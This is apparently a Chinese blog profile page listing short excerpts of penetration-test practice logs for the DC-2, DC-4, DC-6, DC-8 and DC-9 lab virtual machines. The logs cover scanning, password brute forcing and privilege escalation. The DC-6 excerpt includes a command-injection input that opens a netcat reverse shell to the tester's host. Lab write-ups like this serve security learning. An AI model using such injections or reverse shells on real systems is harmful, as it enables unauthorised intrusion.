- 博客(6)
- 收藏
- 关注
原创 DC-4靶机渗透学习记录
(因为我的一台windows server 2019开着,所以多了一台177的主机IP,如果想要分清IP和主机,可以使用nmap获取主机信息进行判断,在此不多赘述,DC-4的IP为:192.168.202.178)backups目录(存在old-passwords.bak文件,发现是个密码字典,猜测可能存在jim的密码可以利用ssh爆破连接)看回显内容,包含命令(ls -l)和执行回显目录,所以在我们点击Run的时候,这里肯定存在一个命令执行。mbox(根据内容,大概是一个测试的邮件信息,可以留意一下)
2024-10-29 16:33:03
1225
原创 DC-6靶机渗透学习记录
7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。
2024-07-16 17:01:58
1784
原创 DC-2靶机渗透学习记录
1)根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry。1)根据flag2提示,我们要去寻找其他攻击渗透点,所以我们把目光放到靶机的第二个端口7744端口。打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt。1)根据flag1提示,我们使用cewl工具,提取网页中关键词,生成密码字典。3)进入/root目录查看最终flag文件,完成DC-2靶机渗透。
2024-07-14 18:59:44
2065
原创 DC-9靶机渗透学习记录
我们可以通过端口探测进行开启ssh服务。通俗来说端口探测可以理解为,我按顺序敲击端口就可以将ssh服务打开,反之敲击关闭,端口顺序存放在/etc/knockd.conf文件中。发现用户名和密码,尝试在web登陆页面使用,尝试几次后并不能登录,猜测该用户名和密码并不是web登录页面的用户名和密码。kali中安装需要的工具,如:nmap,sqlmap,dirb,hydra,nc,burpsuite等等。发现新的fredf用户,登录该用户,sudo -l命令查看到以root权限运行的文件,进行查看。
2024-07-13 18:55:08
2084
1
原创 DC-8靶机渗透过程学习记录
不确定必不必要但我做了(由于windows系统下编辑然后上传到linux系统执行会导致的格式错误,要加上本地编辑查看文件类型:set ff=unix,按shift+:set ff=unix,再回车保存退出,然后再去上传执行的时候才不会报错)kali中要有所需要的工具,如:nmap,sqlmap,中国蚁剑,dirb,searchsploit等等。10.使用123.sh,获得root权限,进入/root目录,打开flag.txt文件,完成本次靶机。2.打开kali,nmap查看kali的IP地址。
2024-07-12 21:40:10
617
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅